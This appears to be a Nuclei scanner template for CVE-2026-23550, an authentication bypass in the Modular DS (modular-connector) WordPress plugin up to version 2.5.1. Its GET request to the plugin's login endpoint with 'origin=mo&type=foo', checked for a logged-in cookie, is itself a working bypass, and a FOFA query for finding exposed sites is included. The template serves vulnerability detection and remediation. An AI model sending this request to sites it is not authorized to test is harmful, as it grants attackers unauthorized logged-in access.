Vulnerability Description
Modular DS = 2.5.1 contains a broken access control vulnerability caused by incorrect privilege assignment, which lets attackers escalate their privileges. Exploitation requires no special conditions.
id: CVE-2026-23550

info:
  name: Modular DS - Broken Access Control
  author: DhiyaneshDk
  severity: high
  description: |
    Modular DS = 2.5.1 contains a broken access control vulnerability caused by incorrect privilege assignment, letting attackers escalate their privileges, exploit requires no special conditions.
  impact: |
    Attackers can escalate their privileges, potentially gaining unauthorized access to sensitive functions or data.
  remediation: |
    Update to the latest version beyond 2.5.1.
  reference:
    - https://help.modulards.com/en/article/modular-ds-security-release-modular-connector-252-dm3mv0/
    - https://patchstack.com/database/wordpress/plugin/modular-connector/vulnerability/wordpress-modular-ds-monitor-update-and-backup-multiple-websites-plugin-2-5-1-privilege-escalation-vulnerability
  metadata:
    verified: true
    max-request: 1
    fofa-query: body="/plugins/modular-connector/"
  tags: cve,cve2026,wordpress,wp-plugin,wp,auth-bypass,modular-connector,vkev

variables:
  string: "{{to_lower(rand_text_alpha(5))}}"

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php/api/modular-connector/login/{{string}}?origin=mo&type=foo"
      - "{{BaseURL}}/api/modular-connector/login/{{string}}?origin=mo&type=foo"

    matchers:
      - type: dsl
        dsl:
          - status_code == 302
          - contains(header, "wordpress_logged_in")
        condition: and
# digest: 4a0a00473045022100c46495eb5fe71644479d0feb21339e99a6f869f87692322e2e7e35f9068a08be022069850f178d71c1299402fe646c184201d6c22ecce1ba557dd434fcdf5c012e49:922c64590222798bb761d5b6d8e72950